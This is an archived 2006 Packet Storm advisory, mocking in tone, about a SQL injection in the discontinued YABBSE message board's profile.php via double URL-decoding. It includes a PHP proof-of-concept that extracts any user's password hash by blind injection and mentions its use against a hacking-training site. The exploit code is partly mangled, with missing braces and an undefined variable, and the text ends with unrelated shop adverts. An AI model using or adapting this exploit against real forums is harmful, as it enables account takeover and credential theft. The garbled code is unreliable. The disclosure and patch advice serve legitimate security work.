Type packetstorm
Reporter Sam Thomas
Modified 2006-06-29T00:00:00


                                            `Hey str0ke - Are you the same str0ke whose code I've been ripping, damn I guess I better release my first N3td3v Sponsering Disclosure.....  
NDSD-06-001: YABBSE SQL Injection  
June 23, 2006  
-- Sponsered post  
-- Affected Vendor:  
The YABB SE Team  
-- Affected Products:  
YABBSE (This product is discontinued, but unfortunately still seems to be in mainstream use)  
-- Vulnerability Details:  
This vulnerability allows remote attackers to execute arbitrary SQL on vulnerable installations of the YABBSE message board.   
The specific flaw exists within the "profile.php" php script which is used to give access to user profiles.  
-- Vendor Response:The vendor for this product essentially no longer exists. It is recommended that you move to a supported message board.  
-- Disclosure Timeline:  
2005.06.26 - Vulnerabiliity Discovered  
2005.06.27 - Vendor found to have discontinued support  
2006.06.23 - Public release of advisory  
-- Vulnerability  
The vulnerability exists where the user supplied variable $user is processed by the urldecode() function twice, this allows for the %2527 (decodes to %27 decodes to ') SQL injection technique.  
- Exploit  
The following PoC exploit can be used to retrieve any users (IE admin) password hash which in turn can be used to immitate and login as that user:  
**BEGIN PoC Code  
yabbse exploit  
all versions - product discontinued  
most of the code ripped from http://www.milw0rm.com/exploits/1036 <http://www.milw0rm.com/exploits/1036> so credit to str0ke and milkw0rm  
$server = "www.uberhacker.com <http://www.uberhacker.com> ";  
$port = 80;  
$hash = "";  
$hex = "0123456789abcdef";  
for($i = 1; $i <= 32; $i++ ) {  
$idx = 0;  
$found = false;  
while( !($found) ) {  
$letter = substr($hex, $idx, 1);  
/* %2527 translates to %27, which gets past magic quotes. This is translated to ' by urldecode. */  
$url="/cgi-pbin/board/index.php?board=;action=viewprofile;user=$user%2527+AND+mid(passwd,$i,1)=%2527" . $letter;  
$header = getHeader($server, $port, $url, "");  
if(!preg_match("/An Error Has Occurred/",$header) ) {  
echo $i . ": " . $letter . "\n";  
$found = true;  
$hash .= $letter;  
} else {  
echo "\n\nFinal Hash: $hash\n";  
function getHeader($server, $port, $file, $cookie) {  
$ip = gethostbyname($server);  
$fp = fsockopen($ip, $port);  
if (!$fp) {  
return "Unknown";  
} else {  
$com = "GET $file HTTP/1.1\r\n";  
$com .= "Host: $server:$port\r\n";  
$com .= "Connection: close\r\n";  
$com .= "\r\n";  
fputs($fp, $com);  
do {  
$header.= fread($fp, 512);  
} while( !preg_match('/\r\n\r\n$/',$header) );  
return $header;  
// jazzy2fives 2005-07-26 - mostly stolen from milw0rm.com [2005-06-08]   
** End PoC Code  
-- Patch  
It is recomended that if you insist on continuing the use of this product, you remove the line which reads "$user = urldecode($user);" from all functions in "\sources\proflie.php"  
-- Credit:  
This vulnerability was discovered by me!   
-- About N3td3v Sponsoring Disclosures:  
Established by me, n3td3v sponsering disclosures (NDSD) is a system established to reward n3td3v for his (her?) posts to full disclosure which bring me more amusement than any 0-day possibly could.   
The NDSD is unique in how vulnerability information sponsers the incompetency of n3td3v, for each amusing n3td3v post NDSD will attempt to release a disclosure of a previously unknown lame exploit. This is because most valid complaints aginst n3td3v claim that (s/)he contributes nothing to the secutiy comunity. The aim of NDSD is to sponser n3td3v posts thus ensuring that each directly corresponds to a positve contribution to FULL-DISCLOSURE.  
-- Misc  
For anyone interested, this was the exploit used to hijack www.uberhacker.com <http://www.uberhacker.com> - a legal hacker trainng site, which had as their primary challenge to hijack the website. The site has since had the majority of it's content removed.  
NDSD are a subsidiary of empty vessels (www.emptyvessels.org.uk <http://www.emptyvessels.org.uk> ), one day we might get our website up.  
For more information about Aquaterra Leisure, see www.aquaterra.org  
To shop for speedo or polar at bargain prices, see www.aquashop.org